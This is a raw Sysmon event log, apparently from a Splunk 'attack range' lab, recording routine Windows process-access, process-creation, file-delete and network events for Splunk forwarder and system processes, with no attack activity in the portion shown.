11:28:44.714{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223429Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.714{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223428Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.714{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223427Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.714{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223426Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.714{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223425Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.714{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223424Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.714{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1A6C-6216-6405-000000003902}2528C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223423Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.714{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1A6C-6216-6405-000000003902}2528C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223422Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.715{4F8D34B0-1A6C-6216-6405-000000003902}2528C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223421Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.495{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CBB42E6AB50DF10AF97C6C7E7E15C7F,SHA256=9F2418AF5C7E28C0D723A42FF584D29DA016C5500E40E42ECA6BA6AA0F894770,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299612Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:44.306{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=541AF7D0DF4B4863F7118CCD94FBCD75,SHA256=C1126A8124D0AD93E9CD553111C3E8617F195560BB174543A2081E673E718853,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223420Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.214{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1A6C-6216-6305-000000003902}2728C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223419Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223418Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223417Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223416Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223415Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223414Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223413Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223412Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223411Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.214{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223410Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.214{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1A6C-6216-6305-000000003902}2728C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223409Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.214{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1A6C-6216-6305-000000003902}2728C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223408Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:44.214{4F8D34B0-1A6C-6216-6305-000000003902}2728C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000299611Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:41.533{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49629-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000223438Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:45.527{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F5F9110B2AB7E58AEF6833CD651EFC4,SHA256=F55184FE369731A4B5E3C7E63F9F5DC159D3E64A4C426560E1D8BC2C5B35C3DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299613Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:45.307{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFAC48AC9B72A444496EC83CC0DC726F,SHA256=A49B68F19D889E1A244991B388ABCEE21A9D2905799A952D74AA43099A34B653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223437Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:45.230{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=084E9AC8CA9838BB47A2183B756C446B,SHA256=364926D902E6DFC1A8950A7CA6657FDD16C8E5F102ED1E2498C199F78A8E9C1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223436Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:45.230{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=196E9C5196D7EB9D6501C2016A7505BF,SHA256=5E8E5DB84C09F5E9FBCAF161ABA2253052B8A288B9BD774CE74E661E628BABBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223453Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:46.856{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223452Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 